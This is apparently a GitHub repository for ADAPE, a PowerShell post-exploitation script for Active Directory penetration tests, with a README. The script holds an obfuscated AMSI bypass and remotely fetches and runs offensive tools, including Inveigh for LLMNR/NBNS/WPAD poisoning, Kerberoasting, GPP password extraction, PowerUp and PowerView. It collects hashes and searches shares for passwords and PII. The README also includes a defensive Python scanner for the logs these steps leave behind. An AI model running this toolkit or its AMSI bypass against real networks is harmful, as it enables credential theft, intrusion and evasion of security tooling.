├── .gitattributes
├── ADAPE.ps1
├── README.md
└── Screenshots
    └── ADAPE.PNG

/.gitattributes:
--------------------------------------------------------------------------------
```
# Auto detect text files and perform LF normalization
* text=auto
```
--------------------------------------------------------------------------------

/ADAPE.ps1:
--------------------------------------------------------------------------------
```powershell
[CmdletBinding()]
Param(
    [Int]$threads=20,
    [Parameter(Mandatory=$false)][switch]$Inv=$false,
    [Parameter(Mandatory=$false)][switch]$GPP=$false,
    [Parameter(Mandatory=$false)][switch]$Kerberoast=$false,
    [Parameter(Mandatory=$false)][switch]$Bloodhound=$false,
    [Parameter(Mandatory=$false)][switch]$PrivEsc=$false,
    [Parameter(Mandatory=$false)][switch]$PView=$false,
    [Parameter(Mandatory=$false)][switch]$All=$false
)
Write-Host '
 ______ _______ ______ _______ ________
/ \ | \ / \ | \ | \
| $$$$$$\| $$$$$$$\| $$$$$$\| $$$$$$$\| $$$$$$$$
| $$__| $$| $$ | $$| $$__| $$| $$__/ $$| $$__
| $$ $$| $$ | $$| $$ $$| $$ $$| $$ \
| $$$$$$$$| $$ | $$| $$$$$$$$| $$$$$$$ | $$$$$
| $$ | $$| $$__/ $$| $$ | $$| $$ | $$_____
| $$ | $$| $$ $$| $$ | $$| $$ | $$ \
\$$ \$$ \$$$$$$$ \$$ \$$ \$$ \$$$$$$$$
' -ForegroundColor Magenta

Write-Host '
#############################################################
#                                                           #
#   Active Directory And Privilege Escalation Script v3.0   #
#                                                           #
#                   Developed By @Haus3c                    #
#                                                           #
#############################################################' -ForegroundColor Green

<#
.SYNOPSIS
The purpose of this script is to run a few different things during the post-exploitation phase without having to port over multiple scripts. I didn't make the scripts used in this module, I'm not that smart. I just put it all together.
Author: @haus3c
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.PARAMETER Inv
Runs the Inveigh function. Responds to LLMNR, NBNS, and WPAD broadcasts for 5 minutes by default. Credit: @Kevin_Robertson.

.PARAMETER GPP
Runs the Group Policy Preferences function. Searches for local admin passwords in the SYSVOL share of DCs. Credit: @obscuresec

.PARAMETER Kerberoast
Runs the Kerberoast function. Queries for SPNs and their TGTs. Default storage is in Hashcat format because Hashcat>JtR. Credit: @TimMedin and @harmj0y

.PARAMETER Bloodhound
Runs the Bloodhound function which runs the PowerShell 'sharphound' data collector. Speed is optimized over stealth by default. Credit: @cptjesus, @wald0, @harmj0y

.PARAMETER PrivEsc
Runs the PrivEsc function which runs All Checks via the PowerUp script. Credit: @harmj0y

.PARAMETER PView
Runs the PowerView module. The full module is included, so add whatever arguments you want in the function. By default it's looking for open shares, sensitive files, exploitable systems, and domain policy. Credit: @mattifestation @harmj0y

.PARAMETER All
Does all of the above

.EXAMPLE
Set-ExecutionPolicy Bypass ./ADAPE.ps1 -All

.EXAMPLE
Set-ExecutionPolicy Bypass ./ADAPE.ps1 -Inv -GPP -Kerberoast

#>

Set-ExecutionPolicy Unrestricted
#amsi bypass, disable if you think this will get you caught.
[ScriptBlock].Assembly.GetType('System.Management.Automation.Am'+'siUtils')."GetF`ield"('am'+'siInitFailed','NonP'+'ublic,Static').SetValue($null,$true)
#Admin Check
If (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
    Write-Host "NOT running as Administrator; only Bloodhound+PrivEsc+Kerberoast modules enabled."
}
$ErrorActionPreference= 'silentlycontinue'
$directory = pwd
$path = $directory.path + "\Capture"
$zip = $directory.path + "\Captured"
#OSCheck
$OS=(Get-WMIObject win32_operatingsystem).name
$version = $OS.Substring(0, $OS.IndexOf("|"))
New-Item -ItemType Directory -Force -Path $path | Out-Null
Write-Host "Capture folder located at $path" -ForegroundColor Green
Write-Host "OS Detected: $version"
If( $OS -match "10" -or
    $OS -match "2012" -or
    $OS -match "2016" -or
    $OS -match "8")

#Inveigh
function Inveigh
{
    New-Item -ItemType File -Force $path/Inv.psm1 | Out-Null
    $Inveigh = iwr -uri https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
    [System.IO.File]::WriteAllText("$path/Inv.psm1", $Inveigh.content)
    Import-Module $path/Inv.psm1
    rm $path/Inv.psm1
    Write-Host "Attempting WPAD, LLMNR, and NBTNS poisoning" -ForegroundColor Yellow
    Invoke-Inveigh -ConsoleOutput N -NBNS Y -mDNS Y -HTTPS Y -FileOutput Y -FileOutputDirectory $path -RunTime 5
}

#GPP
function GPP
{
    $GPPP = iwr -uri https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Get-GPPPassword.ps1
    Write-Host "Checking for GPP Passwords" -ForegroundColor Yellow
    [System.IO.File]::WriteAllText("$path/GPP.ps1", $GPPP.content)
    Import-Module $path/GPP.ps1
    rm $path/GPP.ps1
    Get-GPPPassword
}
#Kerberoast
function Kerberoast
{
    $Kerb = iwr -uri https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
    Write-Host "Kerberoasting" -ForegroundColor Yellow
    [System.IO.File]::WriteAllText("$path/Kerb.ps1", $Kerb.content)
    Import-Module $path/Kerb.ps1
    rm $path/Kerb.ps1
    Invoke-Kerberoast
}
#Sharphound
function Bloodhound
{
    New-Item -ItemType Directory -Force -Path $path | Out-Null
    $directory = pwd
    $path = $directory.path + "\Capture"
    Write-Host "Sniffy boi sniffin" -ForegroundColor Yellow
    $spath = $path + "\sharp.exe"
    $sharp = iwr -uri https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe?raw=true
    Set-Content $spath -Value $sharp.content -Encoding Byte -Force
    Start-Process $spath
}
#PrivEsc
function PrivEsc
{
    $PrivEsc= iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
    Write-Host "Collecting Privesc methods..." -ForegroundColor Yellow
    [System.IO.File]::WriteAllText("$path/PrivEsc.psm1", $PrivEsc.content)
    Import-Module $path/PrivEsc.psm1
    rm $path/PrivEsc.psm1
    Invoke-AllChecks | Out-File $path\PrivEsc.txt
}
#PowahView
function PView
{
    $PView= iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
    [System.IO.File]::WriteAllText("$path/PView.psm1", $PView.content)
    Import-Module $path/PView.psm1
    rm $path/PView.psm1
    Invoke-ShareFinder -CheckShareAccess -Threads 80 | Out-File $path\ShareFinder.txt
    Get-ExploitableSystem -Verbose | Export-Csv $path\ExploitableSystem.txt
    Get-NetFileServer | Out-File $path\FileServers.txt
    net share | Out-File $path\NetShare.txt
    Get-DomainPolicy | Out-File $path\DomainPolicy.txt
    Write-Host "Checking for exploitable systems..." -ForegroundColor Yellow
    Write-Host "Searching for file servers..." -ForegroundColor Yellow
    Write-Host "Checking for attached shares..." -ForegroundColor Yellow
    Write-Host "Grabbing Domain Policy..." -ForegroundColor Yellow

}
If ($Inv) {
    Inveigh
}

If ($GPP) {
    GPP
}
If ($Kerberoast){
    Kerberoast
}

If ($Bloodhound) {
    Bloodhound
}

If ($PrivEsc) {
    PrivEsc
}

If ($PView) {
    PView
}

If ($All) {
    Inveigh
    GPP
    Kerberoast
    Bloodhound
    PrivEsc
    PView
}
#Zip it all up and remove leftovers

Stop-Inveigh
If($PSVersionTable.PsVersion.Major -lt 5)
{
    Remove-Item -Recurse -Force $path + "\Inv.psm1"
    Remove-Item -Recurse -Force $path + "\sharp.exe"
    Write-Host "Not running PS5, cannot zip folder. Do it yoself."
    Write-Host "Done!"
}
else
{
    Remove-Item -Recurse -Force $path + "\Inv.psm1"
    Remove-Item -Recurse -Force $path + "\sharp.exe"
    Compress-Archive -Force -Path $path -DestinationPath $zip
    Remove-Item -Recurse -Force $path
    Write-Host "Done! Results stored in the Captured.zip file!" -ForegroundColor Green
}
```
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Active Directory Assessment and Privilege Escalation Script
![adape](https://github.com/hausec/ADAPE-Script/blob/master/Screenshots/ADAPE.PNG)

I take absolutely no credit for the modules used in this script. Thanks to the original authors for the modules used in this script; credits and links are below.

Let's be honest, this is not a red team script. If you're worried about opsec, this script is not for you, as it is loud. If you don't want to mess with the hassle of downloading multiple scripts during a pentest or risk assessment, then this might just be for you. In my previous engagements and assessments, I would run a few PowerShell scripts that help identify next targets, check for bad group policy settings, AD misconfigs, missing patches, etc. This script combines the ones I used routinely and autoruns the functions I use in those scripts, outputting the results into a zip file.

This script will do the following:

• Gather hashes via WPAD, LLMNR, and NBT-NS spoofing

• Check for GPP password (MS14-025)

• Gather hashes for accounts via Kerberoast

• Map out the domain and identify targets via BloodHound

• Check for privilege escalation methods

• Search for open SMB shares on the network

• Search those shares and other accessible directories for sensitive files and strings (Passwords, PII, or whatever you want, really). By default it's looking for the term "password". If you wanted to search for CVVs for example, you'd just add it next to 'password', e.g. password,cvv

• Check patches of systems on the network

• Search for file servers

• Search attached shares

• Gather the domain policy

This script requires access to GitHub, as it just pulls the scripts from GitHub and automates the collection process. There's an AMSI bypass 1-liner in it to bypass AMSI, so if you think that will get you caught, feel free to comment it out.
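For defenders, the execution-policy change, the AMSI bypass one-liner and the raw GitHub tool downloads are exactly what this script leaves behind in PowerShell Script Block Logging (Event ID 4104). The following is an added example, not part of ADAPE or any of the modules it pulls: a small Python scanner that first undoes the two cheap obfuscations the one-liner relies on ('a'+'b' literal joins and backtick-split member names) and only then matches indicators, so the concatenated form cannot slip past a naive string match. The indicator list and the sample log content are assumptions constructed from the lines of the script above.

```python
"""Script Block Logging (Event ID 4104) content scanner for the obfuscation
and tool-fetch patterns seen in ADAPE.ps1. Added example; not part of ADAPE."""
import re

# Indicators the script leaves in logged script blocks (assumed list, not exhaustive).
INDICATORS = {
    "amsi_reflection": re.compile(r"AmsiUtils|amsiInitFailed", re.IGNORECASE),
    "exec_policy_change": re.compile(
        r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.IGNORECASE),
    "remote_tool_fetch": re.compile(
        r"(?:iwr|Invoke-WebRequest)\s+-uri\s+\S*"
        r"(?:Inveigh|Invoke-Kerberoast|PowerUp|PowerView|SharpHound|Get-GPPPassword)",
        re.IGNORECASE),
}

# 'Am'+'siUtils'  ->  'AmsiUtils'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# "GetF`ield"  ->  "GetField"  (the backtick is PowerShell's escape character)
_BACKTICK = re.compile(r'"([^"`]*)`([^"]*)"')


def normalize(script: str) -> str:
    """Repeatedly fold literal joins and drop in-string backticks until stable."""
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = _BACKTICK.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)
    return script


def scan(script: str) -> dict:
    """Map indicator name -> matched strings, evaluated on the normalized text."""
    text = normalize(script)
    hits = {}
    for name, rx in INDICATORS.items():
        found = [m.group(0) for m in rx.finditer(text)]
        if found:
            hits[name] = found
    return hits


# Constructed sample of what 4104 events would carry for the script's first lines.
SAMPLE_4104 = r"""
Set-ExecutionPolicy Unrestricted
[ScriptBlock].Assembly.GetType('System.Management.Automation.Am'+'siUtils')."GetF`ield"('am'+'siInitFailed','NonP'+'ublic,Static').SetValue($null,$true)
$Kerb = iwr -uri https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
"""

if __name__ == "__main__":
    for name, matches in scan(SAMPLE_4104).items():
        print(f"{name}: {matches}")
```

Note that `INDICATORS["amsi_reflection"]` finds nothing in the raw sample and fires only after `normalize`, which is the point of folding the literals before matching.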

Modules used:

| Module Name | Function | Author | Usage |
|-------------|----------|--------|-------|
| [Inveigh](https://github.com/Kevin-Robertson/Inveigh/blob/master/Inveigh.ps1) | `Invoke-Inveigh -ConsoleOutput N -NBNS Y -mDNS Y -HTTPS Y -FileOutput Y -FileOutputDirectory $path -RunTime 5` | @Kevin_Robertson | ADAPE.ps1 -Inv |
| [Kerberoast](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1) | `Invoke-Kerberoast -OutputFormat Hashcat \| Out-File $path\Kerberoast.krb` | @harmj0y | ADAPE.ps1 -Kerberoast |
| [Bloodhound](https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe) | `sharp.exe` | @harmj0y, @\_wald0, @CptJesus | ADAPE.ps1 -Bloodhound |
| [Get-GPPP](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Get-GPPPassword.ps1) | `Get-GPP` | @obscuresec, @harmj0y | ADAPE.ps1 -GPP |
| [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) | `Invoke-AllChecks \| Out-File $path\PrivEsc.txt` | @harmj0y, @mattifestation | ADAPE.ps1 -PrivEsc |
| [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) | `Invoke-ShareFinder -CheckShareAccess -Threads 80 \| Out-File $path\ShareFinder.txt` `Get-ExploitableSystem -Verbose \| Export-Csv $path\ExploitableSystem.txt` `Get-NetFileServer \| Out-File $path\FileServers.txt` `net share \| Out-File $path\NetShare.txt` `Get-DomainPolicy \| Out-File $path\DomainPolicy.txt` | @harmj0y, @mattifestation | ADAPE.ps1 -PView |
| Everything at once (All of the Above) | n/a | See above | ADAPE.ps1 -All |

All modules in the script require Administrative access except for Bloodhound and PrivEsc (PowerUp).

After running the .ps1, it will create the capture folder in the same folder it's being run in and zip it. If you're running Windows 7 or below it won't zip, so you'll have to do that yourself. At the end of the script, it deletes all the folders it created (except the .zip file, obviously).

GPP password checking and searching for sensitive files take a while, so don't be surprised if this script takes a long time to finish, depending on the number of domain controllers, open shares, and strings you're searching for. Comment those sections out if they take too long to run.

Usage:

`Set-ExecutionPolicy Bypass `
`./ADAPE.ps1 -All`
or
`./ADAPE.ps1 -GPP -PView -Kerberoast`
etc.
--------------------------------------------------------------------------------

/Screenshots/ADAPE.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hausec/ADAPE-Script/4d0b9ff4f1f94f824364fc846102048b7ac71ea4/Screenshots/ADAPE.PNG
--------------------------------------------------------------------------------